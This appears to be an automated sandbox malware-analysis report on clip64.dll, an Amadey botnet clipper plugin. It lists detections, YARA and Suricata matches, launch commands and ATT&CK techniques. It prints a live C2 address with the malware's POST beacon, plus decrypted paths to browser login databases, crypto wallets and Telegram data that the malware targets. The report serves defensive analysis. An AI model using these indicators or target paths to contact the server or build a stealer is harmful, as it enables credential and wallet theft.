
Windows Analysis Report
clip64.dll

Overview

General Information

Sample name: clip64.dll
Analysis ID: 1620555
MD5: f923f79b330a5bf8ccb3fda0f71a9c48
SHA1: 26145188dc6f3f68ee0ccfacc66b324600a474e9
SHA256: 6788afe6d43f633e870c1814251b2a1cc52e3f8c1e34192687bbc5bfdddc99a4
Tags: Amadey, dll, user-skocherhan

Detection

Amadey
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey's Clipper DLL
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Sample uses string decryption to hide its real strings
Contains functionality for reading data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6120 cmdline: loaddll32.exe "C:\Users\user\Desktop\clip64.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4832 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 5872 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2432 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4696 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2172 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7228 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7236 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7244 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Extracted malware configuration: {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
Yara matches

Source: clip64.dll
  Rule: JoeSecurity_Amadey_3 | Description: Yara detected Amadey's Clipper DLL | Author: Joe Security
  Rule: loader_amadey_clipper_plugin | Description: Finds Amadey's clipper plugin based on characteristic strings | Author: Sekoia.io
  Strings:
    • 0x1b516:$str01: CLIPPERDLL.dll
    • 0x1b525:$str02: ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
    • 0x1b547:$str03: ??4CClipperDLL@@QAEAAV0@ABV0@@Z
    • 0x1b567:$str04: Main
    • 0x1b762:$str05: OpenClipboard
    • 0x1b7aa:$str06: GetClipboardData

Source: 18.2.rundll32.exe.6d500000.0.unpack
  Rule: JoeSecurity_Amadey_3 | Description: Yara detected Amadey's Clipper DLL | Author: Joe Security
  Rule: loader_amadey_clipper_plugin | Description: Finds Amadey's clipper plugin based on characteristic strings | Author: Sekoia.io
  Strings: the same six matches ($str01 to $str06) at the same offsets (0x1b516 to 0x1b7aa) as in clip64.dll

Source: 14.2.rundll32.exe.6d500000.0.unpack
  Rule: JoeSecurity_Amadey_3 | Description: Yara detected Amadey's Clipper DLL | Author: Joe Security
  Rule: loader_amadey_clipper_plugin | Description: Finds Amadey's clipper plugin based on characteristic strings | Author: Sekoia.io
  Strings: the same six matches ($str01 to $str06) at the same offsets (0x1b516 to 0x1b7aa) as in clip64.dll

Sigma: No Sigma rule has matched
Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                      Source IP     Src Port  Destination IP  Dst Port  Protocol
2025-02-21T01:51:20.681835+0100  2856152  1         A Network Trojan was detected  185.196.8.37  80        192.168.2.7     49700     TCP
2025-02-21T01:51:23.230307+0100  2856152  1         A Network Trojan was detected  185.196.8.37  80        192.168.2.7     49707     TCP

        AV Detection

Source: http://185.196.8.37/Gd85kkjf/index.php# | Avira URL Cloud: Label: malware
Source: http://185.196.8.37/Gd85kkjf/index.php | Avira URL Cloud: Label: malware
Source: clip64.dll | Malware Configuration Extractor: Amadey {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
Source: clip64.dll | ReversingLabs: Detection: 73%
Source: clip64.dll | Virustotal: Detection: 77%
Source: memory dump 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmp | String decryptor recovered the following strings:
  • \Mozilla\Firefox\Profiles\
  • _Electrum(
  • electrum_data\wallets
  • Electrum\wallets
  • \logins.json
  • Exodus\exodus.wallet\
  • Electrum.exe
  • 185.196.8.37
  • /Gd85kkjf/index.php
  • Litecoin\wallets
  • DashCore\wallets\
  • Telegram.exe
  • _Desktop.zip
  • atomic\Local Storage\
  • CentBrowser
  • key=clear
  • tdata\key_datas
  • _Telegram(
  • \user_data
  • \dictionaries
  • \CentBrowser\User Data\Local State
  • \CentBrowser\User Data\Default\Login Data
  • \Chedot\User Data\Default\Login Data
  • \Comodo\Dragon\User Data\Local State
  • \Google\Chrome\User Data\Default\Login Data
  • \CocCoc\Browser\User Data\Local State
  • \Microsoft\Edge\User Data\Local State
  • \Orbitum\User Data\Default\Login Data
  • \Google\Chrome\User Data\Local State
  • \Vivaldi\User Data\Default\Login Data
  • \Comodo\Dragon\User Data\Default\Login Data
  • \CocCoc\Browser\User Data\Default\Login Data
  • \SputnikLab\Sputnik\User Data\Local State
  • \Opera Software\Opera Stable\Login Data
  • \Opera Software\Opera Stable\Local State
  • \Microsoft\Edge\User Data\Default\Login Data
Source: clip64.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: clip64.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D50BCEE FindFirstFileExW

        Networking

Source: Network traffic | Suricata IDS: 2856152 - Severity 1 - ETPRO MALWARE Ameday CnC Response M2 : 185.196.8.37:80 -> 192.168.2.7:49707
Source: Network traffic | Suricata IDS: 2856152 - Severity 1 - ETPRO MALWARE Ameday CnC Response M2 : 185.196.8.37:80 -> 192.168.2.7:49700
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.196.8.37 80
Source: Malware configuration extractor | IPs: 185.196.8.37
Source: global traffic | HTTP traffic detected (two identical requests observed):
  POST /Gd85kkjf/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.196.8.37
  Content-Length: 5
  Cache-Control: no-cache
  Data Raw: 77 6c 74 3d 31
  Data Ascii: wlt=1
Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
Source: unknown | TCP traffic detected without corresponding DNS query: 185.196.8.37 (reported 24 times)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D501EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1 (same headers and body wlt=1 as the request above)
Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003349000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/
Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php
Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php#
Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php4
Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phpPe4
Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phph
Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phpo
Source: rundll32.exe, 0000000E.00000002.3720488782.000000000333F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phpw
Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003349000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.37/t%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D5031B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard

        System Summary

Source: clip64.dll, type: SAMPLE | Matched rule: Finds Amadey's clipper plugin based on characteristic strings, Author: Sekoia.io
Source: 18.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE | Matched rule: Finds Amadey's clipper plugin based on characteristic strings, Author: Sekoia.io
Source: 14.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE | Matched rule: Finds Amadey's clipper plugin based on characteristic strings, Author: Sekoia.io
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D5031B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D511AB1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6D5073B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6D505D90 appears 103 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6D506B05 appears 47 times
Source: clip64.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: clip64.dll, type: SAMPLE | Matched rule: loader_amadey_clipper_plugin author = Sekoia.io, description = Finds Amadey's clipper plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 487b6657-8834-45ee-8fd4-03df9c0dd7be
Source: 18.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE | Matched rule: loader_amadey_clipper_plugin author = Sekoia.io, description = Finds Amadey's clipper plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 487b6657-8834-45ee-8fd4-03df9c0dd7be
Source: 14.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE | Matched rule: loader_amadey_clipper_plugin author = Sekoia.io, description = Finds Amadey's clipper plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 487b6657-8834-45ee-8fd4-03df9c0dd7be
Source: classification engine | Classification label: mal100.troj.spyw.evad.winDLL@18/0@0/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: clip64.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: clip64.dll | ReversingLabs: Detection: 73%
Source: clip64.dll | Virustotal: Detection: 77%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\clip64.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,Main
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: clip64.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (reported 15 times)
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 493
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 9500
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 2405
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 7588
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012 | Thread sleep count: 493 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012 | Thread sleep time: -493000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012 | Thread sleep count: 9500 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012 | Thread sleep time: -9500000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248 | Thread sleep count: 2405 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248 | Thread sleep time: -2405000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248 | Thread sleep count: 7588 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248 | Thread sleep time: -7588000s >= -30000s
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed (reported 4 times)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D50BCEE FindFirstFileExW
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: rundll32.exe, 0000000E.00000002.3720488782.000000000338E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003349000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.3720488782.000000000338E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW

        Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 42% for more than 60s
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D509820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D50B881 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D50A254 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D50D218 GetProcessHeap
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D506B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D507288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.196.8.37 80
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D5070A7 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_6D5073F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

        Stealing of Sensitive Information

Source: Yara match | File source: clip64.dll, type: SAMPLE
Source: Yara match | File source: 18.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE
MITRE ATT&CK matrix (rendered as a table in the original report; only the column headers and the flagged technique names survived extraction)

Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact

Techniques flagged for this sample: DLL Side-Loading, Process Injection, Virtualization/Sandbox Evasion, Deobfuscate/Decode Files or Information, Obfuscated Files or Information, Rundll32, System Time Discovery, Security Software Discovery, File and Directory Discovery, Application Window Discovery, System Information Discovery, Clipboard Data, Archive Collected Data, Encrypted Channel, Ingress Tool Transfer, Non-Application Layer Protocol, Application Layer Protocol
Behavior graph (rendered as an image in the original report). Behavior Graph ID: 1620555; Sample: clip64.dll; Start date: 21/02/2025; Architecture: WINDOWS; Score: 100. Signatures attached to the graph root: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures. Process nodes: loaddll32.exe starts rundll32.exe (three shown, plus 5 other processes, one of which starts a further rundll32.exe); one rundll32.exe node carries "System process connects to network (likely due to code injection or exploit)" and another "Found potential dummy code loops (likely to delay analysis)". Network node: 185.196.8.37, ports 49700, 49707, 80, SIMPLECARRER2IT, Switzerland.
